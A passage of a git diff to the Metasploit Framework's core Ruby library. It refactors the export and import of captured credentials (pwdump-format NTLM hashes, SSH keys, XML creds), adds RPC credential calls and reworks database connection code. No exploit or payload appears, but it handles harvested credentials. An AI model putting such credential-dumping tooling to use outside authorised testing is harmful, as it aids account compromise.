+++ b/lib/msf/core/db_export.rb
@@ -28,175 +28,19 @@ class Export
     true
   end
 
-  # Creates the PWDUMP text file. smb_hash and ssh_key credentials are
-  # treated specially -- all other ptypes are treated as plain text.
-  #
-  # Some day in the very near future, this file format will be importable --
-  # the comment preceding the credential is always in the format of IPAddr:Port/Proto (name),
-  # so it should be a simple matter to read them back in and store credentials
-  # in the right place. Finally, this format is already parsable by John the Ripper,
-  # so hashes can be bruteforced offline.
+
+  # Performs an export of the workspace's `Metasploit::Credential::Login` objects in pwdump format
+  # @param path [String] the path on the local filesystem where the exported data will be written
+  # @return [void]
   def to_pwdump_file(path, &block)
-    yield(:status, "start", "password dump") if block_given?
-    creds = extract_credentials
-    report_file = ::File.open(path, "wb")
-    report_file.write "# Metasploit PWDump Export v1\n"
-    report_file.write "# Generated: #{Time.now.utc}\n"
-    report_file.write "# Project: #{myworkspace.name}\n"
-    report_file.write "#\n"
-    report_file.write "#" * 40; report_file.write "\n"
+    exporter = Metasploit::Credential::Exporter::Pwdump.new(workspace: workspace)
 
-    count = count_credentials("smb_hash",creds)
-    scount = creds.has_key?("smb_hash") ? creds["smb_hash"].size : 0
-    yield(:status, "start", "LM/NTLM Hash dump") if block_given?
-    report_file.write "# LM/NTLM Hashes (%d services, %d hashes)\n" % [scount, count]
-    write_credentials("smb_hash",creds,report_file)
-
-    count = count_credentials("smb_netv1_hash",creds)
-    scount = creds.has_key?("smb_netv1_hash") ? creds["smb_netv1_hash"].size : 0
-    yield(:status, "start", "NETLMv1/NETNTLMv1 Hash dump") if block_given?
-    report_file.write "# NETLMv1/NETNTLMv1 Hashes (%d services, %d hashes)\n" % [scount, count]
-    write_credentials("smb_netv1_hash",creds,report_file)
-
-    count = count_credentials("smb_netv2_hash",creds)
-    scount = creds.has_key?("smb_netv2_hash") ? creds["smb_netv2_hash"].size : 0
-    yield(:status, "start", "NETLMv2/NETNTLMv2 Hash dump") if block_given?
-    report_file.write "# NETLMv2/NETNTLMv2 Hashes (%d services, %d hashes)\n" % [scount, count]
-    write_credentials("smb_netv2_hash",creds,report_file)
-
-    count = count_credentials("ssh_key",creds)
-    scount = creds.has_key?("ssh_key") ? creds["ssh_key"].size : 0
-    yield(:status, "start", "SSH Key dump") if block_given?
-    report_file.write "# SSH Private Keys (%d services, %d keys)\n" % [scount, count]
-    write_credentials("ssh_key",creds,report_file)
-
-    count = count_credentials("text",creds)
-    scount = creds.has_key?("text") ? creds["text"].size : 0
-    yield(:status, "start", "Plaintext Credential dump") if block_given?
-    report_file.write "# Plaintext Credentials (%d services, %d credentials)\n" % [scount, count]
-    write_credentials("text",creds,report_file)
-
-    report_file.flush
-    report_file.close
-    yield(:status, "complete", "password dump") if block_given?
+    File.open(path, 'w') do |file|
+      file << exporter.rendered_output
+    end
     true
   end
 
-  # Counts the total number of credentials for its type.
-  def count_credentials(ptype,creds)
-    sz = 0
-    if creds[ptype]
-      creds[ptype].each_pair { |svc, data| data.each { |c| sz +=1 } }
-    end
-    return sz
-  end
-
-  # Formats credentials according to their type, and writes it out to the
-  # supplied report file. Note for reimporting: Blank values are <BLANK>
-  def write_credentials(ptype,creds,report_file)
-    if creds[ptype]
-      creds[ptype].each_pair do |svc, data|
-        report_file.write "# #{svc}\n"
-        case ptype
-        when "smb_hash"
-          data.each do |c|
-            user = (c.user.nil? || c.user.empty?) ? "<BLANK>" : c.user
-            pass = (c.pass.nil? || c.pass.empty?) ? "<BLANK>" : c.pass
-            report_file.write "%s:%d:%s:::\n" % [user,c.id,pass]
-          end
-        when "smb_netv1_hash"
-          data.each do |c|
-            user = (c.user.nil? || c.user.empty?) ? "<BLANK>" : c.user
-            pass = (c.pass.nil? || c.pass.empty?) ? "<BLANK>" : c.pass
-            report_file.write "%s::%s\n" % [user,pass]
-          end
-        when "smb_netv2_hash"
-          data.each do |c|
-            user = (c.user.nil? || c.user.empty?) ? "<BLANK>" : c.user
-            pass = (c.pass.nil? || c.pass.empty?) ? "<BLANK>" : c.pass
-            if pass != "<BLANK>"
-              pass = (c.pass.upcase =~ /^[\x20-\x7e]*:[A-F0-9]{48}:[A-F0-9]{50,}/nm) ? c.pass : "<BLANK>"
-            end
-            if pass == "<BLANK>"
-              # Basically this is an error (maybe around [\x20-\x7e] in regex) above
-              report_file.write(user + "::" + pass + ":")
-              report_file.write(pass + ":" +  pass + ":" + pass + "\n")
-            else
-              datas = pass.split(":")
-              if datas[1] != "00" * 24
-                report_file.write "# netlmv2\n"
-                report_file.write(user + "::" + datas[0] + ":")
-                report_file.write(datas[3] + ":" +  datas[1][0,32] + ":" + datas[1][32,16] + "\n")
-              end
-              report_file.write "# netntlmv2\n"
-              report_file.write(user + "::" + datas[0] + ":")
-              report_file.write(datas[3] + ":" +  datas[2][0,32] + ":" + datas[2][32..-1] + "\n")
-            end
-          end
-        when "ssh_key"
-          data.each do |c|
-            if ::File.exists?(c.pass) && ::File.readable?(c.pass)
-              user = (c.user.nil? || c.user.empty?) ? "<BLANK>" : c.user
-              key = ::File.open(c.pass) {|f| f.read f.stat.size}
-              key_id = (c.proof && c.proof[/^KEY=/]) ? c.proof[4,47] : "<NO-ID>"
-              report_file.write "#{user} '#{key_id}'\n"
-              report_file.write key
-              report_file.write "\n" unless key[-1,1] == "\n"
-            # Report file missing / permissions issues in the report itself.
-            elsif !::File.exists?(c.pass)
-              report_file.puts "Warning: missing private key file '#{c.pass}'."
-            else
-              report_file.puts "Warning: could not read the private key '#{c.pass}'."
-            end
-          end
-        when "text"
-          data.each do |c|
-            user = (c.user.nil? || c.user.empty?) ? "<BLANK>" : Rex::Text.ascii_safe_hex(c.user, true)
-            pass = (c.pass.nil? || c.pass.empty?) ? "<BLANK>" : Rex::Text.ascii_safe_hex(c.pass, true)
-            report_file.write "%s:%s:::\n" % [user,pass]
-          end
-        end
-        report_file.flush
-      end
-    else
-      report_file.write "# No credentials for this type were discovered.\n"
-    end
-    report_file.write "#" * 40; report_file.write "\n"
-  end
-
-  # Extracts credentials and organizes by type, then by host, and finally by individual
-  # credential data. Will look something like:
-  #
-  #   {"smb_hash" => {"host1:445" => [user1,user2,user3], "host2:445" => [user4,user5]}},
-  #   {"ssh_key" => {"host3:22" => [user10,user20]}},
-  #   {"text" => {"host4:23" => [user100,user101]}}
-  #
-  # This hash of hashes of arrays is, in turn, consumed by gen_export_pwdump.
-  def extract_credentials
-    creds = Hash.new
-    creds["ssh_key"] = {}
-    creds["smb_hash"] = {}
-    creds["text"] = {}
-    myworkspace.each_cred do |cred|
-      next unless host_allowed?(cred.service.host.address)
-      # Skip anything that's not associated with a specific host and port
-      next unless (cred.service && cred.service.host && cred.service.host.address && cred.service.port)
-      # TODO: Toggle active/all
-      next unless cred.active
-      svc = "%s:%d/%s (%s)" % [cred.service.host.address,cred.service.port,cred.service.proto,cred.service.name]
-      case cred.ptype
-      when /^password/
-        ptype = "text"
-      else
-        ptype = cred.ptype
-      end
-      creds[ptype] ||= {}
-      creds[ptype][svc] ||= []
-      creds[ptype][svc] << cred
-    end
-    return creds
-  end
-
 
   def to_xml_file(path, &block)
 
@@ -205,7 +49,7 @@ class Export
     report_file = ::File.open(path, "wb")
 
     report_file.write %Q|<?xml version="1.0" encoding="UTF-8"?>\n|
-    report_file.write %Q|<MetasploitV4>\n|
+    report_file.write %Q|<MetasploitV5>\n|
     report_file.write %Q|<generated time="#{Time.now.utc}" user="#{myusername}" project="#{myworkspace.name.gsub(/[^A-Za-z0-9\x20]/n,"_")}" product="framework"/>\n|
 
     yield(:status, "start", "hosts") if block_given?
@@ -226,12 +70,6 @@ class Export
     extract_service_info(report_file)
     report_file.write %Q|</services>\n|
 
-    yield(:status, "start", "credentials") if block_given?
-    report_file.write %Q|<credentials>\n|
-    report_file.flush
-    extract_credential_info(report_file)
-    report_file.write %Q|</credentials>\n|
-
     yield(:status, "start", "web sites") if block_given?
     report_file.write %Q|<web_sites>\n|
     report_file.flush
@@ -263,7 +101,7 @@ class Export
     report_file.write %Q|</module_details>\n|
 
 
-    report_file.write %Q|</MetasploitV4>\n|
+    report_file.write %Q|</MetasploitV5>\n|
     report_file.flush
     report_file.close
 
@@ -277,7 +115,6 @@ class Export
     extract_host_entries
     extract_event_entries
     extract_service_entries
-    extract_credential_entries
     extract_note_entries
     extract_vuln_entries
     extract_web_entries
@@ -306,8 +143,7 @@ class Export
 
   # Extracts all credentials from a project, storing them in @creds
   def extract_credential_entries
-    @creds = []
-    myworkspace.each_cred {|cred| @creds << cred}
+    @creds = Metasploit::Credential::Core.with_logins.with_public.with_private.workspace_id(myworkspace.id)
   end
 
   # Extracts all notes from a project, storing them in @notes
@@ -346,14 +182,18 @@ class Export
     end
   end
 
-  def create_xml_element(key,value)
+  def create_xml_element(key,value,skip_encoding=false)
     tag = key.gsub("_","-")
     el = REXML::Element.new(tag)
     if value
-      data = marshalize(value)
-      data.force_encoding(Encoding::BINARY) if data.respond_to?('force_encoding')
-      data.gsub!(/([\x00-\x08\x0b\x0c\x0e-\x1f\x80-\xFF])/n){ |x| "\\x%.2x" % x.unpack("C*")[0] }
-      el << REXML::Text.new(data)
+      unless skip_encoding
+        data = marshalize(value)
+        data.force_encoding(Encoding::BINARY) if data.respond_to?('force_encoding')
+        data.gsub!(/([\x00-\x08\x0b\x0c\x0e-\x1f\x80-\xFF])/n){ |x| "\\x%.2x" % x.unpack("C*")[0] }
+        el << REXML::Text.new(data)
+      else
+        el << value
+      end
     end
     return el
   end
@@ -572,22 +412,6 @@ class Export
       end
       report_file.write("    </vulns>\n")
 
-      # Credential sub-elements
-      report_file.write("    <creds>\n")
-      @creds.each do |cred|
-        next unless cred.service.host.id == host_id
-        report_file.write("      <cred>\n")
-        report_file.write("      #{create_xml_element("port",cred.service.port)}\n")
-        report_file.write("      #{create_xml_element("sname",cred.service.name)}\n")
-        cred.attributes.each_pair do |k,v|
-          next if k.strip =~ /id$/
-          el = create_xml_element(k,v)
-          report_file.write("      #{el}\n")
-        end
-        report_file.write("      </cred>\n")
-      end
-      report_file.write("    </creds>\n")
-
       report_file.write("  </host>\n")
     end
     report_file.flush
@@ -621,19 +445,6 @@ class Export
     report_file.flush
   end
 
-  # Extract credential data from @creds
-  def extract_credential_info(report_file)
-    @creds.each do |c|
-      report_file.write("  <credential>\n")
-      c.attributes.each_pair do |k,v|
-        cr = create_xml_element(k,v)
-        report_file.write("      #{cr}\n")
-      end
-      report_file.write("  </credential>\n")
-      report_file.write("\n")
-    end
-    report_file.flush
-  end
 
   # Extract service data from @services
   def extract_service_info(report_file)
diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb
index bc38515141..96079cd3d8 100644
--- a/lib/msf/core/db_manager.rb
+++ b/lib/msf/core/db_manager.rb
@@ -22,6 +22,13 @@ class DBManager
   include Msf::DBManager::Migration
   include Msf::Framework::Offspring
 
+  #
+  # CONSTANTS
+  #
+
+  # The adapter to use to establish database connection.
+  ADAPTER = 'postgresql'
+
   # Mainly, it's Ruby 1.9.1 that cause a lot of problems now, along with Ruby 1.8.6.
   # Ruby 1.8.7 actually seems okay, but why tempt fate? Let's say 1.9.3 and beyond.
   def warn_about_rubies
@@ -34,16 +41,19 @@ class DBManager
 
   # Returns true if we are ready to load/store data
   def active
-    return false if not @usable
-    # We have established a connection, some connection is active, and we have run migrations
-    (ActiveRecord::Base.connected? && ActiveRecord::Base.connection_pool.connected? && migrated)# rescue false
+    # usable and migrated a just Boolean attributes, so check those first because they don't actually contact the
+    # database.
+    usable && migrated && connection_established?
   end
 
   # Returns true if the prerequisites have been installed
   attr_accessor :usable
 
   # Returns the list of usable database drivers
-  attr_accessor :drivers
+  def drivers
+    @drivers ||= []
+  end
+  attr_writer :drivers
 
   # Returns the active driver
   attr_accessor :driver
@@ -86,9 +96,7 @@ class DBManager
       # Database drivers can reset our KCODE, do not let them
       $KCODE = 'NONE' if RUBY_VERSION =~ /^1\.8\./
 
-      require "active_record"
-
-      initialize_metasploit_data_models
+      add_rails_engine_migration_paths
 
       @usable = true
 
@@ -98,22 +106,10 @@ class DBManager
       return false
     end
 
-    # Only include Mdm if we're not using Metasploit commercial versions
-    # If Mdm::Host is defined, the dynamically created classes
-    # are already in the object space
-    begin
-      unless defined? Mdm::Host
-        MetasploitDataModels.require_models
-      end
-    rescue NameError => e
-      warn_about_rubies
-      raise e
-    end
-
     #
     # Determine what drivers are available
     #
-    initialize_drivers
+    initialize_adapter
 
     #
     # Instantiate the database sink
@@ -123,53 +119,69 @@ class DBManager
     true
   end
 
+  # Checks if the spec passed to `ActiveRecord::Base.establish_connection` can connect to the database.
+  #
+  # @return [true] if an active connection can be made to the database using the current config.
+  # @return [false] if an active connection cannot be made to the database.
+  def connection_established?
+    begin
+      # use with_connection so the connection doesn't stay pinned to the thread.
+      ActiveRecord::Base.connection_pool.with_connection {
+        ActiveRecord::Base.connection.active?
+      }
+    rescue ActiveRecord::ConnectionNotEstablished, PG::ConnectionBad => error
+      elog("Connection not established: #{error.class} #{error}:\n#{error.backtrace.join("\n")}")
+
+      false
+    end
+  end
+
   #
   # Scan through available drivers
   #
-  def initialize_drivers
-    self.drivers = []
-    tdrivers = %W{ postgresql }
-    tdrivers.each do |driver|
+  def initialize_adapter
+    ActiveRecord::Base.default_timezone = :utc
+
+    if connection_established? && ActiveRecord::Base.connection_config[:adapter] == ADAPTER
+      dlog("Already established connection to #{ADAPTER}, so reusing active connection.")
+      self.drivers << ADAPTER
+      self.driver = ADAPTER
+    else
       begin
-        ActiveRecord::Base.default_timezone = :utc
-        ActiveRecord::Base.establish_connection(:adapter => driver)
-        if(self.respond_to?("driver_check_#{driver}"))
-          self.send("driver_check_#{driver}")
-        end
+        ActiveRecord::Base.establish_connection(adapter: ADAPTER)
         ActiveRecord::Base.remove_connection
-        self.drivers << driver
-      rescue ::Exception
+      rescue Exception => error
+        @adapter_error = error
+      else
+        self.drivers << ADAPTER
+        self.driver = ADAPTER
       end
     end
-
-    if(not self.drivers.empty?)
-      self.driver = self.drivers[0]
-    end
-
-    # Database drivers can reset our KCODE, do not let them
-    $KCODE = 'NONE' if RUBY_VERSION =~ /^1\.8\./
   end
 
   # Loads Metasploit Data Models and adds its migrations to migrations paths.
   #
   # @return [void]
-  def initialize_metasploit_data_models
-    # Provide access to ActiveRecord models shared w/ commercial versions
-    require "metasploit_data_models"
+  def add_rails_engine_migration_paths
+    unless defined? ActiveRecord
+      fail "Bundle installed '--without #{Bundler.settings.without.join(' ')}'.  To clear the without option do " \
+           "`bundle install --without ''` (the --without flag with an empty string) or `rm -rf .bundle` to remove " \
+           "the .bundle/config manually and then `bundle install`"
+    end
 
-    metasploit_data_model_migrations_pathname = MetasploitDataModels.root.join(
-        'db',
-        'migrate'
-    )
-    metasploit_data_model_migrations_path = metasploit_data_model_migrations_pathname.to_s
+    Rails.application.railties.engines.each do |engine|
+      migrations_paths = engine.paths['db/migrate'].existent_directories
 
-    # Since ActiveRecord::Migrator.migrations_paths can persist between
-    # instances of Msf::DBManager, such as in specs,
-    # metasploit_data_models_migrations_path may already be part of
-    # migrations_paths, in which case it should not be added or multiple
-    # migrations with the same version number errors will occur.
-    unless ActiveRecord::Migrator.migrations_paths.include? metasploit_data_model_migrations_path
-      ActiveRecord::Migrator.migrations_paths << metasploit_data_model_migrations_path
+      migrations_paths.each do |migrations_path|
+        # Since ActiveRecord::Migrator.migrations_paths can persist between
+        # instances of Msf::DBManager, such as in specs,
+        # migrations_path may already be part of
+        # migrations_paths, in which case it should not be added or multiple
+        # migrations with the same version number errors will occur.
+        unless ActiveRecord::Migrator.migrations_paths.include? migrations_path
+          ActiveRecord::Migrator.migrations_paths << migrations_path
+        end
+      end
     end
   end
 
@@ -208,25 +220,22 @@ class DBManager
 
     begin
       self.migrated = false
-      create_db(nopts)
 
-      # Configure the database adapter
-      ActiveRecord::Base.establish_connection(nopts)
+      # Check ActiveRecord::Base was already connected by Rails::Application.initialize! or some other API.
+      unless connection_established?
+        create_db(nopts)
 
-      # Migrate the database, if needed
-      migrate
-
-      # Set the default workspace
-      framework.db.workspace = framework.db.default_workspace
-
-      # Flag that migration has completed
-      self.migrated = true
+        # Configure the database adapter
+        ActiveRecord::Base.establish_connection(nopts)
+      end
     rescue ::Exception => e
       self.error = e
       elog("DB.connect threw an exception: #{e}")
       dlog("Call stack: #{$@.join"\n"}", LEV_1)
       return false
     ensure
+      after_establish_connection
+
       # Database drivers can reset our KCODE, do not let them
       $KCODE = 'NONE' if RUBY_VERSION =~ /^1\.8\./
     end
@@ -234,6 +243,29 @@ class DBManager
     true
   end
 
+  # Finishes {#connect} after `ActiveRecord::Base.establish_connection` has succeeded by {#migrate migrating database}
+  # and setting {#workspace}.
+  #
+  # @return [void]
+  def after_establish_connection
+    self.migrated = false
+
+    begin
+      # Migrate the database, if needed
+      migrate
+
+      # Set the default workspace
+      framework.db.workspace = framework.db.default_workspace
+    rescue ::Exception => exception
+      self.error = exception
+      elog("DB.connect threw an exception: #{exception}")
+      dlog("Call stack: #{exception.backtrace.join("\n")}", LEV_1)
+    else
+      # Flag that migration has completed
+      self.migrated = true
+    end
+  end
+
   #
   # Attempt to create the database
   #
@@ -259,7 +291,13 @@ class DBManager
       errstr = e.to_s
       if errstr =~ /does not exist/i or errstr =~ /Unknown database/
         ilog("Database doesn't exist \"#{opts['database']}\", attempting to create it.")
-        ActiveRecord::Base.establish_connection(opts.merge('database' => nil))
+        ActiveRecord::Base.establish_connection(
+            opts.merge(
+                'database' => 'postgres',
+                'schema_search_path' => 'public'
+            )
+        )
+
         ActiveRecord::Base.connection.create_database(opts['database'])
       else
         ilog("Trying to continue despite failed database creation: #{e}")
diff --git a/lib/msf/core/db_manager/import_msf_xml.rb b/lib/msf/core/db_manager/import_msf_xml.rb
index 8d70b5e1d0..68e712468d 100644
--- a/lib/msf/core/db_manager/import_msf_xml.rb
+++ b/lib/msf/core/db_manager/import_msf_xml.rb
@@ -13,40 +13,40 @@ module Msf
       # Elements that can be treated as text (i.e. do not need to be
       # deserialized) in {#import_msf_web_page_element}
       MSF_WEB_PAGE_TEXT_ELEMENT_NAMES = [
-          'auth',
-          'body',
-          'code',
-          'cookie',
-          'ctype',
-          'location',
-          'mtime'
+        'auth',
+        'body',
+        'code',
+        'cookie',
+        'ctype',
+        'location',
+        'mtime'
       ]
 
       # Elements that can be treated as text (i.e. do not need to be
       # deserialized) in {#import_msf_web_element}.
       MSF_WEB_TEXT_ELEMENT_NAMES = [
-          'created-at',
-          'host',
-          'path',
-          'port',
-          'query',
-          'ssl',
-          'updated-at',
-          'vhost'
+        'created-at',
+        'host',
+        'path',
+        'port',
+        'query',
+        'ssl',
+        'updated-at',
+        'vhost'
       ]
 
       # Elements that can be treated as text (i.e. do not need to be
       # deserialized) in {#import_msf_web_vuln_element}.
       MSF_WEB_VULN_TEXT_ELEMENT_NAMES = [
-          'blame',
-          'category',
-          'confidence',
-          'description',
-          'method',
-          'name',
-          'pname',
-          'proof',
-          'risk'
+        'blame',
+        'category',
+        'confidence',
+        'description',
+        'method',
+        'name',
+        'pname',
+        'proof',
+        'risk'
       ]
 
       #
@@ -80,8 +80,8 @@ module Msf
           # FIXME https://www.pivotaltracker.com/story/show/46578647
           # FIXME https://www.pivotaltracker.com/story/show/47128407
           unserialized_params = unserialize_object(
-              element.elements['params'],
-              options[:allow_yaml]
+            element.elements['params'],
+            options[:allow_yaml]
           )
           info[:params] = nils_for_nulls(unserialized_params)
 
@@ -127,8 +127,8 @@ module Msf
           # FIXME https://www.pivotaltracker.com/story/show/46578647
           # FIXME https://www.pivotaltracker.com/story/show/47128407
           unserialized_headers = unserialize_object(
-              element.elements['headers'],
-              options[:allow_yaml]
+            element.elements['headers'],
+            options[:allow_yaml]
           )
           info[:headers] = nils_for_nulls(unserialized_headers)
 
@@ -174,8 +174,8 @@ module Msf
           # FIXME https://www.pivotaltracker.com/story/show/46578647
           # FIXME https://www.pivotaltracker.com/story/show/47128407
           unserialized_params = unserialize_object(
-              element.elements['params'],
-              options[:allow_yaml]
+            element.elements['params'],
+            options[:allow_yaml]
           )
           info[:params] = nils_for_nulls(unserialized_params)
 
@@ -347,34 +347,40 @@ module Msf
             end
           end
 
-          host.elements.each('creds/cred') do |cred|
-            cred_data = {}
-            cred_data[:workspace] = wspace
-            cred_data[:host] = hobj
-            %W{port ptype sname proto proof active user pass}.each {|datum|
-              if cred.elements[datum].respond_to? :text
-                cred_data[datum.intern] = nils_for_nulls(cred.elements[datum].text.to_s.strip)
+          ## Handle old-style (pre 4.10) XML files
+          if btag == "MetasploitV4"
+            if host.elements['creds'].present?
+              unless host.elements['creds'].elements.empty?
+                origin = Metasploit::Credential::Origin::Import.create(filename: "console-import-#{Time.now.to_i}")
+
+                host.elements.each('creds/cred') do |cred|
+                  username = cred.elements['user'].try(:text)
+                  proto    = cred.elements['proto'].try(:text)
+                  sname    = cred.elements['sname'].try(:text)
+                  port     = cred.elements['port'].try(:text)
+
+                  # Handle blanks by resetting to sane default values
+                  proto   = "tcp" if proto.blank?
+                  pass     = cred.elements['pass'].try(:text)
+                  pass     = "" if pass == "*MASKED*"
+
+                  private = create_credential_private(private_data: pass, private_type: :password)
+                  public  = create_credential_public(username: username)
+                  core    = create_credential_core(private: private, public: public, origin: origin, workspace_id: wspace.id)
+
+                  create_credential_login(core: core,
+                                          workspace_id: wspace.id,
+                                          address: hobj.address,
+                                          port: port,
+                                          protocol: proto,
+                                          service_name: sname,
+                                          status: Metasploit::Model::Login::Status::UNTRIED)
+                end
               end
-            }
-            %W{created-at updated-at}.each { |datum|
-              if cred.elements[datum].respond_to? :text
-                cred_data[datum.gsub("-","_")] = nils_for_nulls(cred.elements[datum].text.to_s.strip)
-              end
-            }
-            %W{source-type source-id}.each { |datum|
-              if cred.elements[datum].respond_to? :text
-                cred_data[datum.gsub("-","_").intern] = nils_for_nulls(cred.elements[datum].text.to_s.strip)
-              end
-            }
-            if cred_data[:pass] == "*MASKED*"
-              cred_data[:pass] = ""
-              cred_data[:active] = false
-            elsif cred_data[:pass] == "*BLANK PASSWORD*"
-              cred_data[:pass] = ""
             end
-            report_cred(cred_data)
           end
 
+
           host.elements.each('sessions/session') do |sess|
             sess_id = nils_for_nulls(sess.elements["id"].text.to_s.strip.to_i)
             sess_data = {}
@@ -399,9 +405,9 @@ module Msf
             end
 
             existing_session = get_session(
-                :workspace => sess_data[:host].workspace,
-                :addr => sess_data[:host].address,
-                :time => sess_data[:opened_at]
+              :workspace => sess_data[:host].workspace,
+              :addr => sess_data[:host].address,
+              :time => sess_data[:opened_at]
             )
             this_session = existing_session || report_session(sess_data)
             next if existing_session
@@ -423,6 +429,7 @@ module Msf
           end
         end
 
+
         # Import web sites
         doc.elements.each("/#{btag}/web_sites/web_site") do |web|
           info = {}
@@ -450,11 +457,11 @@ module Msf
         %W{page form vuln}.each do |wtype|
           doc.elements.each("/#{btag}/web_#{wtype}s/web_#{wtype}") do |element|
             send(
-                "import_msf_web_#{wtype}_element",
-                element,
-                :allow_yaml => allow_yaml,
-                :workspace => wspace,
-                &block
+              "import_msf_web_#{wtype}_element",
+              element,
+              :allow_yaml => allow_yaml,
+              :workspace => wspace,
+              &block
             )
           end
         end
@@ -474,9 +481,9 @@ module Msf
       # @raise [Msf::DBImportError] if unsupported format
       def check_msf_xml_version!(document)
         metadata = {
-            # FIXME https://www.pivotaltracker.com/story/show/47128407
-            :allow_yaml => false,
-            :root_tag => nil
+          # FIXME https://www.pivotaltracker.com/story/show/47128407
+          :allow_yaml => false,
+          :root_tag => nil
         }
 
         if document.elements['MetasploitExpressV1']
@@ -493,6 +500,8 @@ module Msf
           metadata[:root_tag] = 'MetasploitExpressV4'
         elsif document.elements['MetasploitV4']
           metadata[:root_tag] = 'MetasploitV4'
+        elsif document.elements['MetasploitV5']
+          metadata[:root_tag] = 'MetasploitV5'
         end
 
         unless metadata[:root_tag]
@@ -580,3 +589,4 @@ module Msf
     end
   end
 end
+
diff --git a/lib/msf/core/exploit/cmdstager.rb b/lib/msf/core/exploit/cmdstager.rb
index 9e738da248..230c53cdbf 100644
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -2,6 +2,7 @@
 
 require 'rex/exploitation/cmdstager'
 require 'msf/core/exploit/exe'
+require 'msf/base/config'
 
 module Msf
 
diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb
index 120f8693e2..70c7ae6883 100644
--- a/lib/msf/core/framework.rb
+++ b/lib/msf/core/framework.rb
@@ -1,4 +1,5 @@
 # -*- coding: binary -*-
+require 'metasploit/framework/version'
 require 'msf/core'
 require 'msf/util'
 
@@ -16,10 +17,10 @@ class Framework
   # Versioning information
   #
 
-  Major    = 4
-  Minor    = 9
-  Point    = 3
-  Release  = "-dev"
+  Major    = Metasploit::Framework::Version::MAJOR
+  Minor    = Metasploit::Framework::Version::MINOR
+  Point    = Metasploit::Framework::Version::PATCH
+  Release  = "-#{Metasploit::Framework::Version::PRERELEASE}"
 
   if(Point)
     Version  = "#{Major}.#{Minor}.#{Point}#{Release}"
@@ -41,14 +42,6 @@ class Framework
   # EICAR canary
   EICARCorrupted      = ::Msf::Util::EXE.is_eicar_corrupted?
 
-  # API Version
-  APIMajor = 1
-  APIMinor = 0
-
-  # Base/API Version
-  VersionCore  = Major + (Minor / 10.0)
-  VersionAPI   = APIMajor + (APIMinor / 10.0)
-
   #
   # Mixin meant to be included into all classes that can have instances that
   # should be tied to the framework, such as modules.
diff --git a/lib/msf/core/modules/namespace.rb b/lib/msf/core/modules/namespace.rb
index 8555dd8fec..4eb60c3e52 100644
--- a/lib/msf/core/modules/namespace.rb
+++ b/lib/msf/core/modules/namespace.rb
@@ -1,3 +1,6 @@
+require 'metasploit/framework/api/version'
+require 'metasploit/framework/core/version'
+
 # Concern for behavior that all namespace modules that wrap Msf::Modules must support like version checking and
 # grabbing the version specific-Metasploit* class.
 module Msf::Modules::Namespace
@@ -54,11 +57,11 @@ module Msf::Modules::Namespace
   def version_compatible!(module_path, module_reference_name)
     if const_defined?(:RequiredVersions)
       required_versions = const_get(:RequiredVersions)
-      minimum_core_version = required_versions[0]
-      minimum_api_version = required_versions[1]
+      minimum_core_version = Gem::Version.new(required_versions[0].to_s)
+      minimum_api_version = Gem::Version.new(required_versions[1].to_s)
 
-      if (minimum_core_version > ::Msf::Framework::VersionCore or
-          minimum_api_version > ::Msf::Framework::VersionAPI)
+      if (minimum_core_version > Metasploit::Framework::Core::GEM_VERSION ||
+          minimum_api_version > Metasploit::Framework::API::GEM_VERSION)
         raise Msf::Modules::VersionCompatibilityError.new(
                   :module_path => module_path,
                   :module_reference_name => module_reference_name,
diff --git a/lib/msf/core/post.rb b/lib/msf/core/post.rb
index 0e37cfb6dd..cf45672d08 100644
--- a/lib/msf/core/post.rb
+++ b/lib/msf/core/post.rb
@@ -46,4 +46,17 @@ class Msf::Post < Msf::Module
 
     mod
   end
+
+  # This method returns the ID of the {Mdm::Session} that the post module
+  # is currently running agaist.
+  #
+  # @return [NilClass] if there is no database record for the session
+  # @return [Fixnum] if there is a database record to get the id for
+  def session_db_id
+    if session.db_record
+      session.db_record.id
+    else
+      nil
+    end
+  end
 end
diff --git a/lib/msf/core/rpc/v10/rpc_db.rb b/lib/msf/core/rpc/v10/rpc_db.rb
index 1691d5a9f0..32da0c8829 100644
--- a/lib/msf/core/rpc/v10/rpc_db.rb
+++ b/lib/msf/core/rpc/v10/rpc_db.rb
@@ -4,6 +4,9 @@ module RPC
 class RPC_Db < RPC_Base
 
 private
+
+  include Metasploit::Credential::Creation
+
   def db
     self.framework.db.active
   end
@@ -15,6 +18,21 @@ private
     self.framework.db.workspace
   end
 
+  def fix_cred_options(opts)
+    new_opts = fix_options(opts)
+
+    # Convert some of are data back to symbols
+    if new_opts[:origin_type]
+      new_opts[:origin_type] = new_opts[:origin_type].to_sym
+    end
+
+    if new_opts[:private_type]
+      new_opts[:private_type] = new_opts[:private_type].to_sym
+    end
+
+    new_opts
+  end
+
   def fix_options(opts)
     newopts = {}
     opts.each do |k,v|
@@ -88,6 +106,40 @@ private
 
 public
 
+  def rpc_create_cracked_credential(xopts)
+    opts = fix_cred_options(xopts)
+    create_credential(opts)
+  end
+
+  def rpc_create_credential(xopts)
+    opts = fix_cred_options(xopts)
+    core = create_credential(opts)
+
+    ret = {
+        username: core.public.try(:username),
+        private: core.private.try(:data),
+        private_type: core.private.try(:type),
+        realm_value: core.realm.try(:value),
+        realm_key: core.realm.try(:key)
+    }
+
+    if opts[:last_attempted_at] && opts[:status]
+      opts[:core] = core
+      opts[:last_attempted_at] = opts[:last_attempted_at].to_datetime
+      login = create_credential_login(opts)
+
+      ret[:host]   = login.service.host.address,
+      ret[:sname]  = login.service.name
+      ret[:status] = login.status
+    end
+    ret
+  end
+
+  def rpc_invalidate_login(xopts)
+    opts = fix_cred_options(xopts)
+    invalidate_login(opts)
+  end
+
   def rpc_hosts(xopts)
   ::ActiveRecord::Base.connection_pool.with_connection {
     opts, wspace = init_db_opts_workspace(xopts)
@@ -490,33 +542,6 @@ public
   }
   end
 
-  def rpc_report_auth_info(xopts)
-  ::ActiveRecord::Base.connection_pool.with_connection {
-    opts, wspace = init_db_opts_workspace(xopts)
-    res = self.framework.db.report_auth_info(opts)
-    return { :result => 'success' } if(res)
-    { :result => 'failed' }
-  }
-  end
-
-  def rpc_get_auth_info(xopts)
-  ::ActiveRecord::Base.connection_pool.with_connection {
-    opts, wspace = init_db_opts_workspace(xopts)
-    ret = {}
-    ret[:auth_info] = []
-    # XXX: This method doesn't exist...
-    ai = self.framework.db.get_auth_info(opts)
-    ai.each do |i|
-      info = {}
-      i.each do |k,v|
